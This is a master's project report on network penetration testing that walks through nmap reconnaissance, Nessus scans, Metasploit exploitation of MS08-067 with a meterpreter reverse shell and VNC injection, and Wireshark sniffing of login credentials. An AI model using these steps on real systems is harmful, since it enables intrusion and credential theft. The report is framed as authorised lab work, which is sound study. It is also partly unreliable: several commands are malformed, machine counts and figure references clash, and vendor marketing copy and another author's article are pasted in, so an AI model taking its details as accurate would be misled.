Vulnerability and Analysis of Network Penetration

Testing

by

Md Yusuf Miah (Exam Roll: 172139)

A project report submitted to the Institute of Information Technology

in partial fulfilment of the requirements for the degree of
Professional Masters in Information Technology

Supervisor: Dr. Md Whaiduzzaman

Institute of Information Technology

Jahangirnagar University
Savar, Dhaka-1342
July, 2019

1
 CERTIFICATE

The project titled “Vulnerability and Analysis of Network Penetration Testing”

submitted by Student- Md Yusuf Miah, ID: 172139, Session: May 2017, has been
accepted as satisfactory in partial fulfillment of the requirement for the degree of
Professional Masters in Information Technology on Date-of-Defense.

Dr. Md Whaiduzzaman
Supervisor

BOARD OF EXAMINERS

Ms. Fahima Tabassum PMIT Coordinator

Associate Professor, IIT , JU

Dr. M. Mesbahuddin Sarker Member, PMIT Coordination Committee &

Associate Professor, IIT, JU Director IIT

Dr. M. Shamim Kaiser Member, PMIT Coordination Committee

Associate Professor, IIT, JU

Dr. Risala Tasin Khan Member, PMIT Coordination Committee

Associate Professor, IIT, JU

Dr. Md Abu Yousuf Member, PMIT Coordination Committee

Associate Professor, IIT, JU

2
 DECLARATION

I hereby declare that this project work is based on the results found by
ourselves. Materials of work found by other researcher are mentioned by reference.
This thesis, neither in whole nor in part, has been previously submitted for any
degree.

____________________
Md Yusuf Miah
PMIT: 172139

3
 DEDICATION

This research paper is dedicated to my dear father, Who has been working on my
inspiration for my studies as a whole until today, and my beloved mother who, for
months past, has encouraged me attentively with her fullest and truest attention to
accomplish my work with truthful self-confidence.

LIST OF TABLES AND FIGURES

4
Fig-1.1: Network Penetration Approach and Methodology

Fig-1.2: External and Internal Penetration Test

Fig-1.3: Analysis of Network Penetration Testing

Fig-2.1: OS Detection & Service Running & Port Finding

Fig-2.2: Firewall and Port Filtering

Fig-2.3: Whois Information

Fig-2.4: Actual IP Address Finding

Fig-2.5: Web Server Information

Fig-2.6: Subdomain Information

Fig-3.1: Black Box Network

Fig-3.2: White Box Network

Fig-3.3: Gray Box Network

Fig-3.4: Nessus

Fig-3.5: Add Scan

Fig-3.6: Scan Type Setting

Fig-3.7: Scan Type

Fig-3.8: Scan Result

Fig-3.9: Scan Report

Fig-4.1: Msfconsole Start

Fig-4.2: Use MS08-067-netapi

Fig-4.3: Set Payload

Fig-4.4: Set Payload

Fig-4.5: Run VNC

Fig-4.6: Victim M/C

Fig-4.7: Run Wireshark

5
Fig-4.8: Start Captureing

Fig-4.9: HTTP Request

Fig-4.10: Show POST Data

6
 LIST OF ABBREVIATIONS

ISP Internet Service Provider

IDS Intrusion Detection System
DNC Domain Name Server
IP Internet Protocol
TCP Transmission Control Protocol
UDP User Datagram Protocol
GUI Graphic User Interface
NMAP Network Mapper
ICMP Internet Control Protocol
FTP File Transport Protocol
HTTP Hypertext Transfer Protocol
IMAP Internet Message Access Protocol
MS-SQL Microsoft Structure Query Language
My-SQL My Structure Query Language
NCP NetWare Core Protocol
NNTP Network News Transport Protocol
POP3 Post Office Protocol 3
REXEC Remote Execution
RLOGIN Remote Login
SMTP Simple Mail Transport Protocol
SNMP Simple Network Management Protocol
SSHV2 Secure Shell Version 2
VNC Virtual Network Computing

7
 ACKNOWLEDGEMENT

In completion this Post Graduate project I have been fortunate to have support
encouragement form many people. I would like to acknowledgement them for their
co-operation.

First, I would like to thanks Dr. Md Whaiduzzaman, my project supervisor, for

gardening me through each and every step of the process with knowledge and
support. Thanks you for your advice, guidance and assistance.

I would like to express my utmost gratitude to the IIT of Jahangirnagar University

for providing the opportunity to me to pursue the project as a partial fulfillment of
the requirement for the degree of Professional Master's in Information Technology
(PMIT).

I also feel fortunate to be blessed with the guidance and encouragement from my
faculty members. And we remember our friends who helped and supported us a lot.

8
 ABSTRACT

With the emergence of network globalization and advent of internet being the major
tool for international exchange of information, security has always been the most
talked about the topic. Although there are many ways to secure systems and
applications, the only way to truly know how to secure the network is to test it using
some testing procedures.

Hacking and Penetration testing is a testing procedure that is performed to test the
perimeter of a network for security breaches and vulnerabilities. Penetration testing
is also known as ethical hacking because the test is performed by a team of security
experts that have the organization’s permission to hack the network in an attempt to
identify vulnerabilities.

If vulnerabilities are discovered it helps the organization to defend itself against

further attacks. By using the same tools and methodologies hackers use,
administrators can test their security procedures and discover vulnerabilities before
they are exploited by someone else.

Any security issues that are found will be presented to the system owner, together
with an assessment of their impact, and often with proposal for mitigation or a
technical solution. Thus all the work is done in a proper manner.

Keyword: vulnerability, attack, penetration testing, Kali Linux, BackTrack 5 R3,

Zenmap, Nessus, authentication. Professional Master's in Information Technology
(PMIT).

9
 TABLE OF CONTENTS

Certificate
Candidate’s Declaration
Dedication
List of Tables and Figures
List of Abbreviations
CHAPTER 1..............................................................................................................1-8
1.0 Overview........................................................................................................1
1.1 Introduction2
1.2 Objective of the Study3
1.3 Research Problem Statement4
1.4 Limitations and Delimitation of the Study4
1.5 Internal Penetration Test5
1.6 External Penetration Test7
1.7 Approach8
CHAPTER 2 Information Gathering9-15
2.1 Introduction9
2.2 Service and OS Detection10
2.3 Topology11
2.4 Who is Information12
2.5 IP Address13
2.6 Web Server14
2.7 Sub Domain15
CHAPTER 3 Vulnerability Analysis of Network16-24
3.1 Introduction16
3.2 Black box network vulnerability assessment17
3.3 White Box Network Vulnerability Assessment18
3.4 Gray Box Network Vulnerability Assessment19
3.5 Nessus Vulnerability Scanner20
CHAPTER 4 Exploitation25-33
4.1 Introduction25
4.2 Scanning Phase26
4.3 Packet Sniffers by Wireshark Tool30
CHAPTER 5 Discussion and Conclusion33-36
5.1 Analysis and Sidcussion33
5.2 Reflection on The Proposal Methodology34
5.3 Contribution35
5.4 Future Work35
5.4 Conclusion36
REFERENCE37

10
 CHAPTER 1

Introduction

1.0. Overview

The primary objective for a analysis of network penetration test is to identify

exploitable vulnerabilities in applications before hackers are able to discover and
exploit them. Network penetration testing will reveal real-world opportunities for
hackers to be able to compromise applications in such a way that allows for
unauthorized access to sensitive data or even take-over systems for malicious/non-
business purposes.

This type of assessment is an attack simulation carried out by our highly trained
security consultants in an effort to:

 Identify application security flaws present in the environment

 Understand the level of risk for your organization
 Help address and fix identified application flaws
MIT Security’s network penetration testers have experience developing software
patch not just trying to break it. They leverage this experience to zero in on critical
issues and provide actionable remediation guidance.

As a result of our penetration tests, you’ll be able to view your applications through
the eyes of both a hacker and an experienced developer to discover where you can
improve your security posture. Our consultants produce findings in written reports
and provide your team with the guidance necessary to effectively remediate any
issues we uncover.
1.1 Introduction

11
About two or three decades ago, people were quite happy to leave their houses and
cars unlocked due to low crime levels. However, time has changed now and the
world is fast becoming an unsecured place to live especially for organizations which
deal with influx of heavy data on daily basis, since security has always been an
important issue due to network globalization and internet. However, Ethical hacking
and penetration techniques are preventive measures which consist of a chain of
legitimate tools that identify and exploit a company’s security weaknesses. Ethical
hacking and penetration testing is a platform to find out flaws in network systems.
Vulnerability assessment takes a center stage in finding the weakness of networks
and exploiting such vulnerabilities to detect weakness of the network. Penetration
testing in general involves a lot of techniques such as social engineering and
reconnaissance and most importantly methodologies for using the require tools. [1]

Explain (Fig-1.1): This is overview of Network Penetration Testing. The primary

objective for a network penetration test is to identify exploitable vulnerabilities in
networks, systems, hosts and network devices (ie: routers, switches) before hackers
are able to discover and exploit them.

12
 Fig-1.1: Network Penetration Approach and Methodology [copied]

1.2 Objective of the Study

My main specific objective is to have full knowledge in applying reconnaissance in
all categories in black box penetration and testing, vulnerability assessment,
penetration testing and most importantly in achieving all these, the require tools to
mitigate such act into a network. Accurate tools and methods use to access the flaws
found in a network system and how to exploit such weaknesses and enable such
security vulnerabilities to be block for hackers.
 The core specific objectives of this important study are as follows;
 The use of well-known software tools for hacking
 The importance of active and passive reconnaissance techniques
 Prevention of network systems information into public domain
 Software tools for hacking countermeasures
 The need of penetration testing

13
1.3 Research Problem Statement
Ethical Hacking and Penetration Test is concise where vulnerabilities are found in an
information system and such acts are done in consultation with owners of the
network. Notwithstanding, social engineering is the art of utilizing human behavior
to breach security without the participant even realizing that they have been
manipulated. Sometime black hat hackers get their chance when there are genuine
gaps in the security that they can breach
The problem statements of advance hacking and penetration techniques are as
follows;
 Ninety percent (90%) of Social engineering techniques are used for active
and passive reconnaissance for the targeted network.
 Weak genuine security implementation gaps in networks.
 How to eliminate two main category of social engineering techniques
 Technology based deception
 Human based deception
 Tools such as software’s and methods available to restrict black hat hackers
after applying penetration test.
 Software tools used to identify vulnerabilities in an information systems and
techniques to prevent such flaws.

1.4 Limitations and Delimitation of the Study

Penetration testing cannot be expected to identify all possible weaknesses, nor does it
guarantee that it is 100% secure. New technology and hacking methods can create
new exposures not anticipated during the penetration testing. Thus, it is certain
possible that after a penetration testing, there could be hacking incidents thereafter
because it is impossible to have full but rather only good protection for an
organization’s security system.
Penetration testing involves taking computer screen shots or copying sensitive
information as evidence to prove that the system has key security weaknesses.
However, there are many restrictions on the extent of information that will be

14
available and legitimately accessible to the ethical hacker. This prevents a
penetration testing from simulating as closely of the malicious hackers’ activities
because they are not constrained by any limitations. Firstly, penetration testing may
be governed by the laws and contractual obligations of the organization’s system
because if the test unintentionally retrieves highly confidential information, this may
result in violating the laws and breaching of contractual agreements.
This study is limited to
 Getting the right information will not be possible.
 Acquiring the right or required software tools for penetration testing.
 Incorrect data will be collected when questionnaires are distributed in the
domains of Banks, Internet Service Providers (ISP) and other data centers.
 Evaluation software tools without adequate features.

Delimitations of the study are:

 Full penetration testing
 Denial of service testing
 Scanning a network or systems
 Social engineering techniques
 To know varieties of software testing tools and how they are used.
 Learn all the techniques of active and inactive Reconnaissance

1.5 Internal Penetration Test

An Internal Penetration Test differs from a vulnerability assessment in that it actually
exploits the vulnerabilities to determine what information is actually exposed. An
Internal Penetration Test mimics the actions of an actual attacker exploiting
weaknesses in network security without the usual dangers. This test examines
internal IT systems for any weakness that could be used to disrupt the confidentiality,
availability or integrity of the network, thereby allowing the organization to address
each weakness. [2]
 Internal Network Scanning

15
  Port Scanning
 Exploit Research
 Manual Vulnerability Testing and Verification
 Manual Configuration Weakness Testing and Verification
 Limited Application Layer Testing
 Firewall and ACL Testing
 Administrator Privileges Escalation Testing
 Password Strength Testing
 Network Equipment Security Controls Testing
 Database Security Controls Testing
 Internal Network Scan for Known Trojans

Explain (Fig-1.2): This is overview of External and Internal Penetration Testing.

While the testing is in many ways like external and internal.

Fig-1.2: External and Internal Penetration Test [copied]

16
1.6 External Penetration Test
An External Penetration Test differs from a vulnerability assessment in that it
actually exploits the vulnerabilities to determine what information is actually
exposed to the outside world. An External Penetration Test mimics the actions of an
actual attacker exploiting weaknesses in the network security without the usual
dangers. This test examines external IT systems for any weakness that could be used
by an external attacker to disrupt the confidentiality, availability or integrity of the
network, thereby allowing the organization to address each weakness. [3]
 Footprinting
 Public Information & Information Leakage
 DNS Analysis & DNS Bruteforcing
 Port Scanning
 System Fingerprinting
 Services Probing
 Exploit Research
 Manual Vulnerability Testing and Verification of Identified Vulnerabilities
 Intrusion Detection/Prevention System Testing
 Password Service Strength Testing
 Remediation Retest (optional)

17
1.7 Approach
MIT Security’s network penetration testing service utilizes a comprehensive, risk-
based approach to manually identify critical application-centric vulnerabilities that
exist on all in-scope applications.

Explain (Fig-1.3): This is overview of penetration testing. How to do work of

penetration.

Fig-1.3: Analysis of Network Penetration Testing

18
 CHAPTER 2

Information Gathering

2.1 Introduction
In the same manner Network Penetration is also much like this. When you are going
to hunt a website down then you must know what really you are going to deal with, if
you know your enemy which you are going to face then you can prepare yourself for
that.

So this is why Information Gathering is the first phase of Penetration testing. But
now arise the question what information are we going to collect and where are we
going to get that information from. "Where and how".
2.1.1 There are two types of information gathering:
 Passive Information Gathering
 Active Information Gathering

I) Passive Information Gathering

Passive information gathering can be stated collecting from other sources apart from
victim and we can discover information about targets without touching their systems
or client concern.
For example, you can identify network boundaries, operating systems, open ports,
and web server software in use on the target without touching their system.

II) Active Information Gathering

Active information gathering can be defined as piling up all information when
information of victim or client is been carried out in premises.

19
2.2 Service and OS Detection
Well most of you know what an operating system is but still if any one is confused
that why do we need to know the OS, Notice that the output was highlighted; for
example, open and closed ports were displayed in different colors. [4]
Explain (Fig-2.1): We’ve run a intense scan against a host with the IP address of
10.10.110.2 A scan window contains five tabs, each displaying different aspects of
the scan results:
root@kali:~# nmap –T4 –A –v 10.10.110.2
-v = Increase verbosity level use -vv or more for greater effect
-A = Detect OS and Services

Fig-2.1: OS Detection & Service Running & Port Finding

20
2.3 Topology
Each circle on the diagram represents a host found on the network. If a host has less
than three open ports, it will be green; more than three but less than six open ports,
yellow; and more than six open ports, red. Hosts with filtered ports will have a
yellow padlock symbol next to them.

Explain (Fig-2.2): Topology- displays an interactive view of the connections

between hosts in a network.

Fig-2.2: Firewall and Port Filtering

21
2.4 Who is Information
This is the most basic information about a domain, It shows the registration Details
of the website in which you can commonly see who registered the domain and which
date did he registered it on, when will it expire etc. This information may help you
sometimes in Social engineering like sending him email on his registered email. Or
you use his address, name or contact number in various tasks of Social Engineering.

Explain (Fig-2.3): Find information on any domain name or IP. Large database of
whois information, DNS, domain names, name servers etc.

Fig-2.3: Whois Information

22
2.5 IP Address
Well this ones for newbie’s, actually IP address is the real address behind any
domain name which are resolved by the nameservers. Every Box or you can say a
system contains a unique IP address for example (162.248.48.130). Using it
computers communicate to each other. IP Address will help us targeting the network
as well as find open ports and other exploitable services on the system while
penetration.

Explain (Fig-2.4): The nslookup (which stands for name server lookup) command
finds name server information for domains by querying the Domain Name System.

Fig-2.4: Actual IP Address Finding

23
2.6 Web Server
Webservers the one we are dealing over here is an application which is running over
an Operating system and serves to the web requests coming to the system. Like
Apache, Tomcat, IIS etc are webservers running on an operating system when any
web request is sent to a system they handle it and they are responsible for giving out
the response. Many times you can get Exploits related to a webserver and gets a way
into the system using that exploit, and if you know which webserver is being used
then it will help you to find out the default directories or known vulnerabilities for
that web server. [6]

Explain (Fig-2.5): Find information on web server information which server & PHP
version use.

Fig-2.5: Web Server Information

24
2.7 Sub Domain
If you do not know what subdomains are then, Subdomain are domains maintained
under a domain for example google.com is a domain name then mail.google.com is a
subdomain inside it. We need to collect all available sub domains for a website. In
many cases you may find hidden or private domain where they are maintaining
something private and such application are usually left vulnerable and exposed
because of the assumption the no one can reach them. [7]

Explain (Fig-2.6): A subdomain is a domain that is part of a larger domain; the only
domain that is not also a subdomain is the root domain. Notice that the output was
highlighted; for example, subdomin displayed in different IP.

Fig-2.6: Subdomain Information

25
 CHAPTER 3

Vulnerability Analysis of Network

3.1 Introduction
Vulnerability analysis, also known as vulnerability assessment, is a process that
defines, identifies, and classifies the security holes (vulnerabilities) in a computer,
network, or communications infrastructure. In addition, vulnerability analysis can
forecast the effectiveness of proposed countermeasures and evaluate their actual
effectiveness after they are put into use.

There are several types of vulnerability assessments. These include:

1. Host assessment: The assessment of critical servers, which may be vulnerable to

attacks if not adequately tested or not generated from a tested machine image.

2. Network and wireless assessment: The assessment of policies and practices to

prevent unauthorized access to private or public networks and network-accessible
resources.
3. Database assessment: The assessment of databases or big data systems for
vulnerabilities and misconfigurations, identifying rogue databases or insecure
dev/test environments, and classifying sensitive data across an organization’s
infrastructure.

4. Application scans: The identifying of security vulnerabilities in web applications

and their source code by automated scans on the front-end or static/dynamic analysis
of source code.

26
The list of vulnerability assessment tools is quite long. Among the most well-known
are OpenVAS, Nessus, Nikto, Wireshark, W3af, BurpSuite, SQLMap, IBM
Application Security on Cloud, etc.

3.2 Black box network vulnerability assessment

The main task a cybersecurity team needs to do when performing black box network
vulnerability assessment is to act like real hackers. According to this method, the
security team tries to find ways to get into the company’s network ‘from the outside.’
What can they see in this case? Public IP addresses, the external interface of a
firewall, systems located in the demilitarized zone (DMZ), etc. No administrator
privileges, no access to databases are provided to the ethical hackers. [8]

Explain (Fig-3.1): This is overview of how corporate networks are organized and
how to penetration test of black box network vulnerability assessment.

Fig-3.1: Black Box Network [copied]

27
3.3 White Box Network Vulnerability Assessment
If the cybersecurity team is to perform white box network vulnerability assessment,
they look at the network ‘from the inside,’ having all the privileges of the network
authorized users. They can see the entire network with its file servers, databases. The
security engineers have administrator access to all the servers inside the network.
Their aim is not just to scan the network for vulnerabilities, but also check the
security of the configuration of the machines inside the network.

Explain (Fig-3.2): This is overview of how corporate networks are organized and
how to penetration test of white box network vulnerability assessment.

Fig-3.2: White Box Network [copied]

28
3.4 Gray Box Network Vulnerability Assessment
The third option is gray box network vulnerability assessment that encompasses both
approaches but is closer to black box vulnerability assessment. Security engineers
conduct gray box vulnerability assessment if they get some information on the
organization’s network, such as user login details, but they don’t get access to the
entire network.

Explain (Fig-3.3): This is overview of how corporate networks are organized and
how to penetration test of gray box network vulnerability assessment.

Fig-3.3: Gray Box Network [copied]

29
3.5 Nessus Vulnerability Scanner

Step 1: Get Nessus installed and fire it up!

Nessus usually is installed on localhost and thus localhost in browser followed by the
port number works well to access Nessus. You may have to log into Nessus with the
username and password that is provided while installation. [9]

Explain (Fig-3.4): This is admin login page of Nessus Vulnerability Scanner tools.

Fig-3.4: Nessus

30
Step 2: New Scan in Nessus
You can start a new scan by clicking on the new scan buttons. You can also create
multiple scans depending on your requirements.

Explain (Fig-3.5): This is add new scan starting page of Nessus Vulnerability
Scanner tools.

Fig-3.5: Add Scan

31
Step 3: Scan Type and Settings.
You may have to enter scan details like the name of the scan, description of the scan
and even targets. This includes the IP address of the targets

Explain (Fig-3.6): This is overview of target victim ip & general setting scanning
system.

Fig-3.6: Scan Type Setting

32
Step 4: Scan Type
Depending on your package, you can select the type of scan that you are willing to
run. You may have to upgrade the package in order to run some special scans.

Explain (Fig-3.7): This is overview of scanning type. Which is prefer for target
victim.

Fig-3.7: Scan Type

Step 5: Scan Results

Once the scan is complete, you will be greeted with the scan completed message.
You can click on the vulnerabilities tab to see a list containing all the vulnerabilities
present on the machine. The red/critical vulnerabilities are something that needs to
fix on priority.

Explain (Fig-3.8): This is overview of scanning result. Now we see how many
vulnerabilities are there critical or low.

33
 Fig-3.8: Scan Result
Step 6: Detailed Report
You can also click on the name of the vulnerability to find a detailed report about the
vulnerability and the available fix.

Explain (Fig-3.9): This is overview of scanning result details description. Which

vulnerable there critical specific description.

Fig-3.9: Scan Report

34
 CHAPTER 4

Exploitation

4.1 Introduction
Exploitation is the meridian for every security engineer. It is a great feeling to exploit
a first machine and get full control over that machine. Exploitation is a very difficult
task to accomplish. We need to know much about the target. In this chapter i will
show you advanced techniques to get shell on the target system and you will gain full
control over the victim system.

How to hack a server with Metasploit

By Sumedt Jitpukdebodin
Normally, Penetration Tester or a Hacker use Metasploit to exploit vulnerability
services in the target server or to create a payload to make a backdoor in the hacked
server. But Metastploit has improved with many plugins and modules and now it can
do more than that. It can be used to pentest web applications too.
In this article, I will show you how to use Metasploit for scanning to get the
information of web server and use Metasploit to be a vulnerability assessment of web
application.

35
4.2 Scanning Phase
First thing when you want to hack server, you must get the information of target as
much as you can. So the first thing we must do is scan server.
Metastploit has “db_nmap” a module that use to run nmap (the most famous
scanning tool) and when it gets the result from nmap, it is putting the results into the
database which was created to keep the results. Follow these steps:

Step 1: Start Kali Linux machine.

Step 2: Enter command msfconsole to start metasploit.
root@kali:~# msfconsole

Explain (Fig-4.1): This is starting command of Metasploit Framework on kali linux.

Fig-4.1: Msfconsole Start

36
Step 3: Search for netapi to use exploit windows xp machine.
Msf5 > search netapi
Step 4: Enter command :
Msf5 > use exploit/windows/smb/ms08-067-netapi

Explain (Fig-4.2): Now we will search the Netapi exploit, We’ll be shown a number
of results, among which we’ll find the below vulnerable work or not.

Fig-4.2: Use MS08-067-netapi

Step 5: Enter command as show options, Now it's time to enter victim ip address.
For that command is :
set RHST enter_victim_ipaddress
Step 6: Loading exploit module to compromise victiom machine
set payload windows/meterpreter/reverse_tcp

Explain (Fig-4.3): The exploit is chosen and we need to set certain parameters for
this exploit.

37
 Fig-4.3: Set Payload

Step 7: Setting attacker's ip address ,to get reverse connection from victim machine
set LHOST your_ipaddress
Explain (Fig-4.4): Set lport and lhost, which are the port number and IP address of
the local machine/attacker machine.

Fig-4.4: Set Payload

38
Step 8: Forex. run vnc
We can inject a VNC server remotely using the Metasploit payload for the VNC
injection.
Explain (Fig-4.5): The Virtual Network Computing (VNC) is a graphical desktop
sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely
control another computer.

Fig-4.5: Run VNC

39
Explain (Fig-4.6): This is victim Machine…

Fig-4.6: Victim M/C

4.3 Packet Sniffers by Wireshark Tool

Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to

Application > Kali Linux > Top 10 Security Tools > Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies to you. In
my case, I am using a Wireless USB card, so I’ve selected wlan0. [10]

Explain (Fig-4.7): When we launch Wireshark, a welcome screen lists the available
network connections on your current device. Displayed to the right of each is an
EKG-style line graph that represents live traffic on that network.

40
 Fig-4.7: Run Wireshark

Ideally you could just press Start button here and Wireshark will start capturing
traffic. In case you missed this, you can always capture traffic by going back to
Capture > Interface > Start

Explain (Fig-4.8): Start Wireshark by clicking on the Wireshark start icon. When
Wireshark starts it launches the following screen and provides the following ways to
capture network traffic.

41
 Fig-4.8: Start Capturing

Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing them. I
opened a browser and signed in a website using my username and password. When
the authentication process was complete and I was logged in, I went back and
stopped the capture in Wireshark.

when wee type in your username, password and press the Login button, it generates a
a POST method (in short – you’re sending data to the remote server).

To filter all traffic and locate POST data, type in the following in the filter section
http.request.method == “POST”
See screenshot below. It is showing 1 POST event.

Explain (Fig-4.9): The most basic way to apply a filter is by typing it into the filter
box at the top of the window and clicking Apply (or pressing Enter). For example,
type “http” and you’ll see only http packets. When we start typing, Wireshark will
help us auto complete our filter.

42
 Fig-4.9: HTTP Request
Step 3: Analyze POST data for username and password
Now click on that line of HTML Form URL Encoded

Explain (Fig-4.10): A POST data is a results of user infromation; the email &
passward form the different item.

Fig-4.10: Show POST Data

43
 CHAPTER 5

Discussion & Conclusion

5.1 Analysis and Discussion

This chapter sum up the results obtained during the penetration test in a network
laboratory, gives a brief overview of the necessity of having a penetration test
methodology and attempts to evaluate whether the goals and problems statement
stated in the first chapter were satisfactorily addressed or not. This approach
eventually leads to discussion about the contributions made by this thesis work and
future work.

Intelligence gathering phase identified the machines that were reachable and the
ports open on them, guessed the OS and service on those reachable machines. Nmap
was the primary tool selected for intelligence gathering phase. Nmap proved to be a
versatile tool which scan perform different scans ranging from ping scan to port scan
to OS and services fingerprinting. Initially the Nmap was used to scan the entire
172.29.81.0/20 network range. This scan successfully identified many but only four
targeted machines which IP addresses were 172.29.81.2/20, 172.29.81.90/20, and
172.29.81.93/20 and these machines were identified. This result showed that ICMP
packets within the network were not

blocked and the scan result showed all 1000 ports in identified machines were
unfiltered, which meant no Firewalls or perimeter devices were used to filter the data
in the target machines.
Detail Nmap scan shows open ports, closed ports and number of service being run on
the machines were fully captured on Table 4.17 and 4.18 respectively.

The fascinating result obtained from the main target machine when used Armitage
tool, the vulnerable service to compromise the machine was when metasploit was
applied which revealed msf> use window.smb/ms08_067_netpati which indicated
that 172.29.81.2 port 445 therefore the target is vulnerable. Both Window XP and
window 8 were running the default installation and no additional software installed
on machines. In laboratory network, both of these vulnerabilities were successfully
exploited using Metasploit Framework using Armitage which is Metesploit
Framework graphical interface as shown in Figure 4.19.

44
5.2. Reflection on The Proposal Methodology
One of the goal set in this thesis was to identify how penetration testing by law is
conducted to understand, analyzed security issues pertaining to network systems as a
whole. In order to achieve this goal, a penetration testing methodology was proposed
section 4.1. Following this methodology, penetration testing were conducted against
the laboratory network. Laboratory network represented the internal network with
few clients and server machines. For network and system Administrators, securing
the network and system in an important task to protect network or system from an
outside as well as an inside attacks. Security measures like firewalls and Intruder
Detection System (IDS) help to protect but such measures are not always sufficient
in today’s complex environment. A methodological penetration testing complements
such security measures to test if such security measures in place are good enough or
they have some flaws or misconfiguration.

The proposed methodology not only presented how network and systems
Administrators can utilizes a penetration test but also understand the flow of test
along with each phase. It also showed how free or open source software can
effectively test the networks or systems. These were discussed in literature and part
of methodology chapters and demonstrated how such tools compliments
administrator’s efficiency at assessing the overall system security. Tools selected in
each phase of the proposed methodology were easy to install and configure, the
learning curve to use such tools were minimal and did not require a high end
hardware to setup configuration penetration test.

The objective of reconnaissance or information gathering phase was initially to map

the network, discover the reachable machines, and determine open ports, services
and operating systems within the entire network segment. The objective of scanning
and vulnerability assessment phase was to enumerate further and make use of the
automation

Scanners enhance the scanning and assessment and discover the extra information
which might have missed during reconnaissance gathering phase. The results or
reports analysis from reconnaissance phase can provide a deeper insight about the
network or system.

However, such analysis helped further to find out what are the real flaws whether it
was a faulty configuration or unpatched systems. The penetration testing
methodology was successful at achieving objective set in scanning and vulnerability
assessment phase. From the pen-tester prospective, one can argue, should the tester
spend additional time performing such penetration testing? Results drawn from this
thesis showed that penetration testing had a value of performed in a systematic and
methodological manner. Penetration testing is something that network and system
Administrators had to live without because of all the other activities they perform
harden the system.

45
5.3 Contribution
Network administrators should be skillful to perform penetration testing to know
flaws their network systems have. Not all network/system administrators can afford
to purchase the commercial tools to perform penetration test. Specially, the
administrator who works in medium or small organization, there will not always be a
separate budget allocation to purchase or hire third party professional to perform
penetration tests. In such a situation this thesis work can provide baseline
information with all the tools.

and methodology. Any Administrator can easily replicate the same or similar
penetration environment. However, depending upon the scope can be broaden.
At present, mostly network/system administrators defend their network or systems
using firewalls to block unidentified or malicious traffic, Intruder Detection System
(IDS) to detect and respond to attacks, anti-virus and anti-malware programs to alert
users about malicious software however, the goal to defend the system or network
from malicious users and intrusion attempts. All those measures are protective and
preventive in nature, which can either succeed or fail on the time they are released
and current evolutions in technology. However, security should not only include
prevention and protection but also prediction and response.

This Thesis also presented a prediction and response model where phases like
intelligence gathering and scanning and vulnerability assessment can be used to
predict the network or system while phases like Exploitation and reporting for
response required to countermeasure the threat and loopholes. After certain time,
certain vulnerability or attack becomes obsolete, but the knowledge on the software
responded to an attack of that extent, can help in identifying similar behaviors in the
future.

5.4 Future Work

This work can be extended in different directions;

 Automation of the entire proposed penetration testing methodology to build a
complete security testing solution can be an extension of this thesis of work.
This extension can empower the network and system administrators of small
and medium scale organization to test and measure IT assets without any
hassles.
 This thesis can be extended to increase the efficiency if human factor is also
considered during a penetration testing. The focus of this thesis was on
finding and exploring the vulnerabilities related to computer networks.
However, employees within the organization are the weakest link in security.
So effort can be made by integrating social engineering tools and techniques
into the existing penetration testing methodology.
 Computer users in organization need to be train to know the techniques
hackers use in reconnaissance.

46
5.5 Conclusion

After going through a deep study of penetration testing framework and analyzing the
various tools used, we have reach to a point of conclusion that:

 Penetration testing provides the organization a snapshot of the overall

security of the network infrastructure.
 A penetration testing process should be carried out in a proper manner and
methodology. Proper planning and analysis phase should be taken most
seriously as all done after it relies on this phase only.
 Metasploit/ Armitage Framework is the best among all other commercial and
open source exploitation tools. Integrating Metasploit with various tools like
nessus, nmap and other third tools make it very efficient. Various extensions,
command are there in Metasploit or Armitage framework which can be used
for Post Exploitation.
 An automated Penetration Testing Framework integrated with various third
party tools works much faster than manual testing framework.

This thesis explored and investigated the various network penetration testing tools
and methodologies. The main results are as follows;
 Design and developed the enhance framework of network penetration testing
over the laboratory personally built. This framework tries to find out the
loopholes and vulnerabilities in the network and exploit them before
attackers. Hence provide an assurance of secure network.
 Demonstrated the use of penetration testing over campus network by
avoiding unnecessary expenditure of professional testers as they also follow
same tools and techniques and their unreliable nature.

The success of any penetration test depends on the underlying methodology. In order
to perform successful penetration test, the underlying methodology should also make
use of different security tools. One of the goal set in this thesis was to examine
different security tools and techniques. Different tools like Nmap. Nessus, Armitage
and Metesploit Framework were introduced first and examined. The selection of the
tools were based on its versatility, usability

and effectiveness. With all the tools in hand, each phase of the methodology were
carried out in a systematic and methodological manner. The selected tools were
divided into three categories.
The reconnaissance or intelligence gathering phase covered the tools which assisted
in network profiling, network scanning and operating and service fingerprinting.
Nmap was identified as one of the best tool during this phase. Scanning and
Vulnerability Assessment phase covered the tools which
allowed the exploration of network and system vulnerabilities. Metasploit framework
or Armitage was more than a tool, it was complete penetration testing framework,
but it can also be used as a tool during exploration and post-exploitation phases due
to its abundance of arbitrary exploits, usability and effectiveness.

47
 References

[1] Network Penetration, https://www.redteamsecure.com/network-penetration-

testing [Last access on 11 Jan. 2019].
[2] Internal Penetration, https://www.hacklabs.com/internal-penetration-testing
[Last access on 12 Jan. 2019].
[3] External Penetration, https://www.hacklabs.com/penetration-testing [Last
access on 09 Feb. 2019].
[4] Nmap Scanning, https://nmap.org/book/man-version-detection.html [Last
access on 10 Feb. 2019].
[5] Domain Whois, https://bgp.he.net/ip/103.73.104.1#_whois [Last access on
23 Mar. 2019].
[6] Web Server Information, http://browserspy.dk/webserver.php [Last access
on 15 Apr. 2019].
[7] DNS Record, https://dnsdumpster.com/ [Last access on 16 Apr. 2019].
[8] Vulnerability Assessment Guide, https://www.scnsoft.com/blog/network-
vulnerability-assessment-guide [Last access on 25 May. 2019].
[9] Identify Vulnerabilities, https://priyankgada.blogspot.com/2017/12/how-to-
identify-vulnerabilities-ft.html [Last access on 19 Jun. 2019].
[10] Wireshark, https://www.guru99.com/wireshark-passwords-sniffer.html [Last
access on 13 Jul. 2019].

48